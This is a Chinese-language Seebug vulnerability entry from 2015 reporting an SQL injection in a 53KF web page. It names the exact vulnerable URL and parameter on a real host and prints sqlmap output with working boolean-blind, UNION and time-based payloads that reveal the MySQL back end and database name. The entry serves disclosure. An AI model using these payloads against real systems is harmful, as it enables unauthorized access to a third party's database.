53KF某处一个注入点

2015-02-02T00:00:00
ID SSV:94386
Type seebug
Reporter Root
Modified 2015-02-02T00:00:00

Description

简要描述:

某处的一个注入

详细说明:

存在注入的地址:

http://www10.53kf.com/zdy_dbgg2.php?style_id=106098168&company_id=72067196&dbgg_type=2

``` sqlmap identified the following injection points with a total of 0 HTTP(s) requests:


Place: GET Parameter: style_id Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: style_id=106098168 AND 2074=2074&company_id=72067196&dbgg_type=2 Type: UNION query Title: MySQL UNION query (NULL) - 9 columns Payload: style_id=106098168 UNION ALL SELECT NULL,NULL,CONCAT(0x716d617171,0x4a4f52497265634c4342,0x716a617271),NULL,NULL,NULL,NULL,NULL,NULL#&company_id=72067196&dbgg_type=2 Type: AND/OR time-based blind Title: MySQL > 5.0.11 AND time-based blind Payload: style_id=106098168 AND SLEEP(5)&company_id=72067196&dbgg_type=2


[21:51:47] [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL 5.0.11 [21:51:47] [INFO] fetching current database current database: 'talk' [21:51:48] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www10.53kf.com' ```

漏洞证明:

<img src="https://images.seebug.org/upload/201502/01220607164e8bd78a7522403259367f03a6cbf4.png" alt="11.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201502/012206266fbcca5d856b20666fb1502aa72b31fd.png" alt="22.png" width="600" onerror="javascript:errimg(this);">